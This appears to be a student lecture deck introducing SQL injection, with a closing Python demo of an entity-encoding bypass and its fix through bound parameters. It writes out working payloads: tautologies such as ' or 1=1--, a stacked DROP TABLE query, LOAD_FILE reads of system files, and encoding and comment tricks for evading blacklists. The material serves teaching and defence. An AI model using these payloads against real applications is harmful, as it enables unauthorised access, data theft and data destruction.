SQL – Injections Intro.
Prajen Bhadel
College of Information Technology & Engineering, Kathmandu, Tinkune
Sixth semester
SQL Injections
• SQL injection – code injection technique that exploits a security vulnerability in an application
  – Occurs at the database layer of an application
• SQL – Structured Query Language
  – Used to communicate with the database
  – ANSI-compliant SQL
SQL Injections
• Authentication Bypass
• Information Disclosure
• Compromised Data Integrity
• Compromised Availability of Data
• Remote Command Execution
Basic SQL
• Select
• Insert
• Update
• Delete
• Union
• SQL statement breakdown
SQL - Select
1. Select Information from a table
SELECT * FROM table where field=1
SQL - Insert
1. Add new records to database
INSERT INTO tablename (id, name) VALUES (10, 'Greg')
SQL - Update
1. Updating existing records
UPDATE table set fieldA=123 WHERE somefield=2323
UPDATE table set fieldB='Greg'
SQL - Delete
1. Delete records
DELETE FROM tableA where somefield=1221
DELETE FROM tableA
SQL - Union
1. Combine two or more SELECT statements.
SELECT column_name(s) FROM table_name1
UNION
SELECT column_name(s) FROM table_name2
Terminators
• ; Semicolon ends the current SQL query and starts a new one
  – SELECT * FROM users ; DROP TABLE users
• Stacked Query
• -- Double dash ignores the remaining query string
  – SELECT * FROM users -- limit 10
• Can be used in conjunction
  – SELECT * FROM users WHERE id=''; DROP TABLE users; -- ' AND password=''
Where Clause Pruning
• Powerful SQL technique
  – SQL trick for allowing a query to return either the full set or a specified subset
  – 1=1 == TRUE
• SELECT * FROM users
  WHERE (id = :id) OR (-1 = :id)
SQL Injection Cause
• Executed via the front end of the Web Application
  – GET URL parameter
    • http://host.com/item.php?cat=1&id=11
  – Form POST fields
    • <form action="some.php" method="post"> <input name='name'/> <input type='password' name='passwd'/></form>
Techniques
• Normal SQL Injections
  – Errors & Exceptions
  – Unexpected output
    • O'Reilly != O\'Reilly
• Blind SQL Injections
  – No errors
  – A lot of guesswork
  – Introduction of a delay as part of a malicious SQL statement
SQL Injection Types
• Passive – Exposing database information
  – Information retrieval
• Active – Altering database information
  – Insertion
  – Deletion
Testing for Vulnerability
• Manual
  – Time consuming
• Automated
  – SQL injection scanners only scan for known vulnerabilities
• Google
  – Search for the error string "Incorrect syntax near"
Toolbox
• SQLIer
• SQLbftools
• SQLibf
• SQLBrute
• BobCat
• SQLMap
• Absinthe
• SQL Injection Pen-testing Tool
• SQID
• SQLNinja
• FJ-Injector Framework
• Automagic SQL Injector
• NGSS SQL Injector
Identifying Vulnerable Site
• Given unexpected input, the site behaves oddly
  – ' Single quote
  – " Double quote
  – '1 Single quote, one
  – 'a Single quote, a
  – '; Single quote, semicolon
• Input > Satan's little minion
  – Nothing found for Satan\'s little minion
  – You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'
Identifying Vulnerable Site
• ' or 1=1--
• " or 1=1--
• or 1=1--
• ' or 'a'='a
• " or "a"="a
• ') or ('a'='a
Bypassing Filters
• Escaping entities
  – %26%23039 == &#039 == ' (single quote)
    • %26 == &
    • %23 == #
    • 039 Entity number
  – Select * FROM users WHERE username='secret%26%23039 OR %26%23039X%26%23039=%26%23039X
  – Evaluated as > Select * FROM users WHERE username='secret' OR 'X' = 'X'
    • This evaluates to always true
• Char function
  – Char(83,101,108,101,99,116,32,42,32,102,114,111,109,32,117,115,101,114,115)
  – Select * from users
• Concat & Hex functions
  – CONCAT('0x', HEX('/var/log/messages'))
  – 0x2F7661722F6C6F672F6D65737361676573
Bypassing Filters
• Injecting AND 1=(SELECT LOAD_FILE('var/log/messages') )
  – MySQL Error '\'var/log/messages\') ) limit 5 = 1 order by average desc limit 10' at line 1)
Bypassing Filters
• 1=(SELECT LOAD_FILE('var/log/messages') )
  – MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'var/log/messages\') ) limit 5 -- = 1 order by average desc limit 10' at line 1)
• Char
• Hex
  – 1=(SELECT LOAD_FILE(0x2F7661722F6C6F672F6D65737361676573))
Bypassing Blacklists
• What are Blacklists
• Blacklist (DELETE, EXEC)
  – DEL/**/ETE
  – /**/ D/**EVIL**/ELE/**/TE
Escape Characters
• %26%23039 OR %26%23039X%26%23039=%26%23039X
  – ' OR 'X' = 'X'
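The entity-encoding bypass from the Bypassing Filters and Escape Characters slides, replayed against a constructed in-memory SQLite users table (an added example, not code from the original slides; the table contents, the `naive_filter` check and the URL-then-HTML decoding order are assumptions). It shows why a blacklist that runs before decoding lets `%26%23039` through, and why a bound parameter makes the decoded quote harmless.

```python
import html
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed sample data (not from the slides): a tiny users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw1"), (2, "bob", "pw2"), (3, "secret", "pw3")],
    )
    return conn


def naive_filter(raw):
    """Assumed blacklist check: rejects a quote, but runs on the raw,
    still-encoded parameter. '%26%23039' contains no quote, so it passes."""
    return "'" not in raw


def decode(raw):
    """Assumed decoding order: URL-decode, then HTML-entity decode.
    '%26%23039' -> '&#039' -> "'"  (the slides' escaping-entities trick)."""
    return html.unescape(unquote(raw))


def lookup_concat(conn, raw):
    """Vulnerable lookup: filter before decoding, then concatenate into SQL.
    The decoded payload closes the quote and appends OR 'X'='X'."""
    if not naive_filter(raw):
        return []
    sql = f"SELECT id, username FROM users WHERE username='{decode(raw)}'"
    return conn.execute(sql).fetchall()


def lookup_param(conn, raw):
    """Fixed lookup: identical decoding, but the value is a bound parameter,
    so the quote and the OR clause are just characters inside a string."""
    sql = "SELECT id, username FROM users WHERE username=?"
    return conn.execute(sql, (decode(raw),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "secret%26%23039 OR %26%23039X%26%23039=%26%23039X"
    print(decode(payload))                  # secret' OR 'X'='X
    print(len(lookup_concat(db, payload)))  # 3 -> every user returned
    print(lookup_param(db, payload))        # [] -> no such username
```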